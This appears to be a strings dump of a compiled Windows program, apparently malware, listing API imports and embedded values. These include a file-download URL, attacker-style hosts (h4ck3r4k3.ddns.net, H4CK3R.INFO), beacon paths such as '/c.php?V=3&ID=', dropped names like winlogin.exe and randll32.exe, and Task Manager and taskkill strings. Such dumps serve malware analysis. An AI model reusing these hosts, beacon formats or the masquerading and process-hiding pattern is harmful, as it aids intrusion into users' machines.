.?AVexception@std@@
.?AV_Facet_base@std@@
.?AVfacet@locale@std@@
.?AVfailure@ios_base@std@@
.?AV_Generic_error_category@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV_Iostream_error_category@std@@
.?AVlength_error@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AV_Ref_count_base@std@@
.?AV?$_Ref_count_del_alloc@V__ExceptionPtr@@P6AXPAV1@@ZV?$_DebugMallocator@H@@@std@@
.?AV?$_Ref_count@V__ExceptionPtr@@@std@@
.?AVruntime_error@std@@
.?AVscheduler_resource_allocation_error@Concurrency@@
.?AV_System_error_category@std@@
.?AVsystem_error@std@@
.?AV_System_error@std@@
.?AVtype_info@@
.?AVunsupported_os@Concurrency@@
> >A>y>
bad address
bad_address
bad allocation
bad cast
bad exception
bad file descriptor
bad_file_descriptor
bad locale name
bad message
 Base Class Array'
 Base Class Descriptor at (
__based(
;.;B;H;M;
BRichn
broken pipe
bWWWWj
__cdecl
CD$HPj
 Class Hierarchy Descriptor'
CloseHandle
CloseThreadpoolTimer
CloseThreadpoolWait
__clrcall
cmd.exe
CompareStringEx
CompareStringW
 Complete Object Locator'
COMSPEC
\config.ini
config.ini
connection aborted
connection_aborted
connection already in progress
connection_already_in_progress
connection refused
connection_refused
connection reset
connection_reset
ContextPriority
ContextStackSize
`copy constructor closure'
CopyFileA
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
CorExitProcess
/c.php?V=3&ID=
CreateDirectoryA
CreateDirectoryW
CreateEventExW
CreateFile2
CreateFileW
CreateMutexA
CreateProcessA
CreateSemaphoreExW
CreateSymbolicLinkW
CreateThread
CreateThreadpoolTimer
CreateThreadpoolWait
CreateToolhelp32Snapshot
cross device link
>Cu/f9F
C:\Users\MrUnzO\Documents\Visual Studio 2013\Projects\ConsoleApplication3\Release\ConsoleApplication3.pdb
C:\Windows\system32\cmd.exe - 
D$0SVW
D$'9D$ 
@.data
dddd, MMMM dd, yyyy
_DebugMallocator<T>::allocate() - Integer overflow.
December
DecodePointer
`default constructor closure'
 delete
 delete[]
DeleteCriticalSection
DeleteFileW
destination address required
destination_address_required
:d<==E=V=g=
device or resource busy
<(<D<h<
D$hPh`
directory not empty
D$ SVW
D$(SVW
`dynamic atexit destructor for '
`dynamic initializer for '
DynamicProgressFeedback
__eabi
>)?E?f?
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
empty distance tree with lengths
EncodePointer
EnterCriticalSection
EnumChildWindows
EnumSystemLocalesEx
EnumSystemLocalesW
<@En[vP
executable format error
ExitProcess
__fastcall
February
file exists
filename too long
filename_too_long
file too large
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
;F;`;j;t;
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FlushProcessWriteBuffers
FreeEnvironmentStringsW
FreeLibraryWhenCallbackReturns
Friday
function not supported
>F>V>^>h>
;F<y<-=s=
G0Pj.S
G4Pj/S
G8PjDS
GDPjGS
GdPjOS
generic
GetACP
GetActiveWindow
GetClassNameA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleWindow
GetCPInfo
GetCurrentDirectoryW
GetCurrentPackageId
GetCurrentProcess
GetCurrentProcessId
GetCurrentProcessorNumber
GetCurrentProcessorNumberEx
GetCurrentThread
GetCurrentThreadId
GetDateFormatEx
GetEnvironmentStringsW
GetExitCodeProcess
GetFileAttributesExW
GetFileAttributesW
GetFileInformationByHandleExW
GetFileType
GetLastActivePopup
GetLastError
GetLastInputInfo
GetLocaleInfoEx
GetLocaleInfoW
GetLogicalProcessorInformation
GetLogicalProcessorInformationEx
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleExW
GetModuleHandleW
GetOEMCP
GetPrivateProfileIntA
GetProcAddress
GetProcessAffinityMask
GetProcessHeap
GetProcessWindowStation
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemDirectoryA
GetSystemTimeAsFileTime
GetThreadGroupAffinity
GetThreadTimes
GetTickCount
GetTickCount64
GetTimeFormatEx
GetUserDefaultLCID
GetUserDefaultLocaleName
GetUserObjectInformationW
GetVersionExW
GetWindowTextA
GetWindowThreadProcessId
GhPj8S
GHPjHS
GlPj9S
GLPjIS
G<PjES
G@PjFS
G\PjMS
G`PjNS
G|Pj=S
G Pj*S
G,Pj-S
G(Pj,S
G$Pj+S
GPPjJS
GpPj:S
GTPjKS
GtPj;S
GXPjLS
GxPj<S
`h````
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
?(?H?h?
`h`hhh
HH:mm:ss
HHtVHHt
host unreachable
host_unreachable
Ht+Ht$Ht
http://ge.tt/api/1/files/7ZgNjE32/0/blob?download
http://h4ck3r4k3.ddns.net
http://H4CK3R.INFO
_hypot
identifier removed
illegal byte sequence
inappropriate io control operation
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
InitializeCriticalSectionAndSpinCount
InitializeCriticalSectionEx
InitializeSListHead
interrupted
invalid argument
invalid_argument
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid seek
invalid stored block lengths
invalid string position
invalid window size
io error
ios_base::badbit set
ios_base::eofbit set
ios_base::failbit set
iostream
iostream stream error
:i=s=}=
is a directory
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
IsValidLocale
IsValidLocaleName
=;=J=`=
j0hHLC
j1n1r1v1$6(64686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6
jA[jZZ+
JanFebMarAprMayJunJulAugSepOctNovDec
January
jAZjZ^
:J:_:e:
j"_f9y
j@j _W
j	PjYV
KERNEL32.dll
LCMapStringEx
LCMapStringW
LeaveCriticalSection
l,kg<i
:,:L:l:
LoadLibraryA
LoadLibraryExW
LocalContextCacheSize
LocalFileTimeToFileTime
Local\$myprogram$
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MaxConcurrency
MaxPolicyElementKey
MessageBoxW
message size
message_size
MinConcurrency
MM/dd/yy
Monday
MultiByteToWideChar
< <-<M<W<a<r<v<
need dictionary
network down
network_down
network reset
network_reset
network unreachable
network_unreachable
 new[]
_nextafter
)N\)N|
no buffer space
no_buffer_space
no child process
no link
no lock available
no message
no message available
no protocol option
no_protocol_option
no space on device
no stream resources
no such device
no such device or address
no such file or directory
no such process
not a directory
not a socket
not_a_socket
not a stream
not connected
not_connected
not enough memory
not supported
November
(null)
October
`omni callsig'
?!?O?n?
OpenProcess
operation canceled
operation in progress
operation_in_progress
operation not permitted
operation not supported
operation_not_supported
operation would block
operation_would_block
operator
OutputDebugStringW
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
owner dead
?$?\?p?
.P6AXPAV__ExceptionPtr@@@Z
__pascal
permission denied
permission_denied
~pjCXf
`placement delete closure'
`placement delete[] closure'
PP9E u
PPPPPPPP
Process32First
Process32Next
Processes
protocol error
protocol not supported
protocol_not_supported
PSSSSV
>(>,><>@>P>T>d>h>8?X?`?h?p?x?
__ptr64
PWWWWV
;';<;Q;i;
Qkkbal
QQSVWd
QQSVWh
QueryPerformanceCounter
=Q=X=\=`=d=h=l=p=t=
RaiseException
randll32.exe
`.rdata
ReadConsoleW
ReadFile
read only file system
ReadProcessMemory
RegCloseKey
RegCreateKeyExW
RegSetValueExW
@.reloc
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
      <requestedPrivileges>
resource deadlock would occur
Resource Monitor
resource unavailable try again
__restrict
restrict(
result out of range
RoInitialize
RoUninitialize
RtlUnwind
RVSQSWV
s(9C4u
Saturday
`scalar deleting destructor'
SchedulerKind
SchedulingProtocol
    </security>
    <security>
SendMessageA
September
SetCurrentDirectoryA
SetDefaultDllDirectories
SetEndOfFile
SetEnvironmentVariableA
SetEvent
SetFileInformationByHandleW
SetFilePointer
SetFilePointerEx
SetFileTime
SetLastError
SetStdHandle
SetThreadGroupAffinity
SetThreadpoolTimer
SetThreadpoolWait
SetThreadStackGuarantee
SetUnhandledExceptionFilter
SHELL32.dll
SHGetSpecialFolderPathA
ShowWindow
state not recoverable
__stdcall
stream timeout
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SVjA[jZ^+
,SVWj0X
SVWjA_jZ+
SysListView32
system
SystemRoot
SystemTimeToFileTime
~';_t|%3
TargetOversubscriptionFactor
taskkill /IM 
Task Manager
_tcPVj@
TerminateProcess
text file busy
tfHtWHtHHt/
+t"HHt
tHHt*Ht#
__thiscall
!This program cannot be run in DOS mode.
Thursday
timed out
timed_out
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
too many files open
too_many_files_open
too many files open in system
too many length or distance symbols
too many links
too many symbolic link levels
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
Tuesday
;t$,v-
t WW9}
 Type Descriptor'
`typeof'
tyPVj@W
=%=T=Z=p=w=}=
:u<*=.>
uBjAYjZ+
`udt returning'
uHjAXf;
<\u#j\W
u#j,Xf;
__unaligned
UnhandledExceptionFilter
UNICODE
unknown compression method
unknown error
Unknown exception
 unzip 0.15 Copyright 1998 Gilles Vollant 
\update.zip
update.zip
UQPXY]Y[
URLDownloadToFileA
urlmon.dll
URLMON.DLL
URPQQh
USER32.dll
UTF-16LE
ux;s,u
=>>V>}>
&V=3&cpu=
value too large
`vbase destructor'
`vbtable'
`vcall'
__vectorcall
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
version
\version
VERSION
[VERSION]
VERSION = 1;
`vftable'
VirtualAllocEx
`virtual displacement map'
VirtualFreeEx
;=;V;`;m;
v	N+D$
WaitForSingleObject
WaitForThreadpoolTimerCallbacks
<	=W=c=r=*>}>
Wednesday
;W;g;q;w;
WideCharToMultiByte
\Windows
Windows Task Manager
\winlogin.exe
winlogin.exe
WinRTInitialization
Wj0XPV
WriteConsoleW
WriteFile
WritePrivateProfileStringA
WriteProcessMemory
wrong protocol type
wrong_protocol_type
wsprintfW
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
/x.php?ID=
xppwpp
xpxxxx
Yu2Vj@h